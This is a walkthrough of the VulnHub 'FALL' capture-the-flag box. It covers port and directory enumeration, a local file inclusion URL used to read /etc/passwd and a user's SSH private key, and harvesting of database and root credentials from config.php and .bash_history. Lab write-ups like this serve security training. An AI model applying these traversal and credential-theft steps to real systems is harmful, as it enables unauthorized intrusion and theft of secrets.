FALL

FALL (aka digitalworld.local: FALL) is a virtual machine you can try yourself by downloading it from VulnHub

NMAP

I start pretty much every time with finding out what ports are open:

$ nmap -sV -sC --open -p- -Pn $IP
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-18 01:42 EDT
Stats: 0:05:42 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 12.40% done; ETC: 02:27 (0:40:16 remaining)
Stats: 0:10:08 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 27.09% done; ETC: 02:19 (0:27:17 remaining)
Stats: 0:22:49 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 87.05% done; ETC: 02:08 (0:03:24 remaining)
Nmap scan report for 10.0.1.147
Host is up (0.58s latency).
Not shown: 63995 filtered tcp ports (no-response), 1527 filtered tcp ports (host-unreach), 6 closed tcp ports (conn-refused)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.8 (protocol 2.0)
| ssh-hostkey: 
|   2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA)
|   256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA)
|_  256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519)
80/tcp   open  http        Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
|_http-title: Good Tech Inc's Fall Sales - Home
| http-robots.txt: 1 disallowed entry 
|_/
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
443/tcp  open  ssl/http    Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2019-08-15T03:51:33
|_Not valid after:  2020-08-19T05:31:33
|_ssl-date: TLS randomness does not represent time
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Good Tech Inc's Fall Sales - Home
| tls-alpn: 
|_  http/1.1
445/tcp  open  netbios-ssn Samba smbd 4.8.10 (workgroup: SAMBA)
3306/tcp open  mysql       MySQL (unauthorized)
9090/tcp open  http        Cockpit web service 162 - 188
|_http-title: Did not follow redirect to https://10.0.1.147:9090/
Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
  
Host script results:
|_clock-skew: mean: 2h20m01s, deviation: 4h02m31s, median: 0s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.8.10)
|   Computer name: fall
|   NetBIOS computer name: FALL\x00
|   Domain name: \x00
|   FQDN: fall
|_  System time: 2022-06-17T23:07:40-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2022-06-18T06:07:38
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Port 22

SSH is running, this will come in handy later!

Port 80

Web Application

CMS Made Simple version 2.2.15

I did my usual gobuster search for directories, poked around in them, but didn't come up with much.

$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.1.147
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/06/18 01:54:33 Starting gobuster in directory enumeration mode
===============================================================
/modules              (Status: 301) [Size: 234] [--> http://10.0.1.147/modules/]
/uploads              (Status: 301) [Size: 234] [--> http://10.0.1.147/uploads/]
/doc                  (Status: 301) [Size: 230] [--> http://10.0.1.147/doc/]    
/admin                (Status: 301) [Size: 232] [--> http://10.0.1.147/admin/]  
/assets               (Status: 301) [Size: 233] [--> http://10.0.1.147/assets/] 
/lib                  (Status: 301) [Size: 230] [--> http://10.0.1.147/lib/]    
/tmp                  (Status: 301) [Size: 230] [--> http://10.0.1.147/tmp/]

I tried looking in exploit-db for this specific version and turned up bsically notthing.

Eventually, one of the many fuzzing lists I tried was the CommonBackdoors-PHP.fuzz.txt from seclists. It turned up a very useful file:

$ gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -u http://$IP 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.1.147
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/test.php             (Status: 200) [Size: 80]
Progress: 422 / 423 (99.76%)
===============================================================
Finished
===============================================================

Misc

The only other information I turned up does at least give us a potential username:

<script>alert('Page not found! Please contact our infrastructure head at patrick@goodtech.inc if you think this is in error!');

Port 139, 445

Nothing really going on with SMB:

$ smbclient -L $IP -U guest
Password for [WORKGROUP\guest]:
session setup failed: NT_STATUS_LOGON_FAILURE
$ smbmap -H $IP -d WORKGROUP
[+] IP: 10.0.1.147:445  Name: 10.0.1.147                                        
		Disk                                                    Permissions     Comment
		----                                                    -----------     -------
		print$                                                  NO ACCESS       Printer Drivers
		IPC$                                                    NO ACCESS       IPC Service (Samba 4.8.10)

Port 3306

Doesn't seem to be a direct way into the database remotely:

$ mysql -h $IP
ERROR 1130 (HY000): Host '10.0.1.136' is not allowed to connect to this MySQL server

Port 9090

I spent some time looking for vulnerabilities, default passwords, fuzzing directories, etc. but didn't find anything very interesting.

Initial Access

Our best bet is that test.php script we found. When we browse to that, we receive an alert that there is a missing GET parameter.

<html>
<body>
<script>alert('Missing GET parameter!');</script>
</body>
</html>

I don't remember how I stumbled on the parameter being named file, but with that we can read any files that are accessible to the user the web server is running as.

But what files should we try and read. There's always /etc/passwd which at best may include passwords or hashes directly (though rarely), but at worst we should get some usernames.

Directory Traversal / Local File Inclusion

http://10.0.1.147/test.php?file=../../../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin
systemd-coredump:x:999:996:systemd Core Dumper:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:998:995:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
cockpit-ws:x:997:993:User for cockpit-ws:/:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:996:991::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
qiu:x:1000:1000:qiu:/home/qiu:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
nginx:x:995:990:Nginx web server:/var/lib/nginx:/sbin/nologin
tss:x:59:59:Account used by the tpm2-abrmd package to sandbox the tpm2-abrmd daemon:/dev/null:/sbin/nologin
clevis:x:994:989:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false

So qiu is a valid user. What are some of the most useful files a user might have? Well it turns out that /home/qiu/.ssh/id_rsa is readable. So let's grab that and then SSH to the box as qiu

ssh -i ./id_rsa qiu@$IP

local.txt

[qiu@FALL ~]$ cat local.txt 
A low privilege shell! :-)

Escalating Privileges

Let's look around more more information. We find some configuration files with possibly some more credentials:

PHP Configuration

[qiu@FALL html]$ more config.php
<?php
# CMS Made Simple Configuration File
# Documentation: https://docs.cmsmadesimple.org/configuration/config-file/config-reference
#
$config['dbms'] = 'mysqli';
$config['db_hostname'] = '127.0.0.1';
$config['db_username'] = 'cms_user';
$config['db_password'] = 'P@ssw0rdINSANITY';
$config['db_name'] = 'cms_db';
$config['db_prefix'] = 'cms_';
$config['timezone'] = 'Asia/Singapore';
$config['db_port'] = 3306;
?>

We can use that to read what might be even more credentials from the web applications users database:

CMS Users Table

mysql> select * from cms_users;
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
| user_id | username | password                         | admin_access | first_name | last_name | email                | active | create_date         | modified_date       |
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
|       1 | qiu      | bc8b9059c13582d649d3d9e48c16d67f |            1 | qiu qing   | chan      | qiu@goodtech.inc     |      1 | 2021-05-21 17:06:29 | 2021-05-22 02:28:53 |
|       2 | patrick  | 6aea70cc6a678f0f83a82e1c753d7764 |            1 | Patrick    | Ong       | patrick@goodtech.inc |      1 | 2021-05-22 02:28:33 | 2021-05-22 16:54:13 |
+---------+----------+----------------------------------+--------------+------------+-----------+----------------------+--------+---------------------+---------------------+
2 rows in set (0.00 sec)

Found password?

Ah, the good ol .bash_history file:

[qiu@FALL ~]$ cat .bash_history 
ls -al
cat .bash_history 
rm .bash_history
echo "remarkablyawesomE" | sudo -S dnf update

Root password is remarkablyawesomE

root.txt

[qiu@FALL ~]$ su
Password: 
[root@FALL qiu]# cd /root
[root@FALL ~]# cat proof.txt 
Congrats on a root shell! :-)

Thanks

Thanks to Donovan for authoring a fun box!